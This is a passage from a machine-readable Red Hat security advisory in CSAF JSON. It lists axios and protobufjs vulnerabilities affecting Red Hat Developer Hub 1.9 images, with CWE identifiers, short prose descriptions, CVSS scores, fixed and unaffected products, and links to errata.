          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461607",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461607"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42033",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"
        }
      ],
      "release_date": "2026-04-24T17:36:44.132000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-42035",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:17.109481+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461606"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application\u0027s core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Arbitrary HTTP header injection via prototype pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461606",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461606"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42035",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"
        }
      ],
      "release_date": "2026-04-24T17:38:07.752000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "axios: Axios: Arbitrary HTTP header injection via prototype pollution"
    },
    {
      "cve": "CVE-2026-42039",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-24T19:01:44.887156+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461630"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461630",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461630"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42039",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"
        }
      ],
      "release_date": "2026-04-24T18:01:30.775000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data"
    },
    {
      "cve": "CVE-2026-42041",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:41.034289+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461629"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution \"Gadget\" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461629",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461629"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42041",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42041"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63"
        }
      ],
      "release_date": "2026-04-24T17:55:30.036000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling"
    },
    {
      "cve": "CVE-2026-42043",
      "cwe": {
        "id": "CWE-918",
        "name": "Server-Side Request Forgery (SSRF)"
      },
      "discovery_date": "2026-04-24T19:01:22.552379+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461626"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: NO_PROXY bypass via crafted URL",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461626",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461626"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42043",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42043"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7"
        }
      ],
      "release_date": "2026-04-24T17:54:42.668000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: NO_PROXY bypass via crafted URL"
    },
    {
      "cve": "CVE-2026-42044",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:13.418725+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461624"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution \"Gadget\" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461624",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461624"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42044",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"
        }
      ],
      "release_date": "2026-04-24T17:49:49.517000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget"
    },
    {
      "cve": "CVE-2026-44293",
      "cwe": {
        "id": "CWE-94",
        "name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
      },
      "discovery_date": "2026-05-13T16:03:50.961609+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2477104"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in protobufjs, a library used to compile protobuf definitions into JavaScript functions. A remote attacker could exploit this vulnerability by providing a crafted descriptor that includes a non-string default value for a bytes field. This could lead to the generation of an unsafe expression within the toObject conversion function, ultimately allowing the attacker to execute arbitrary code.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "protobufjs: protobufjs: Arbitrary code execution due to unsafe expression generation from crafted protobuf descriptors",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
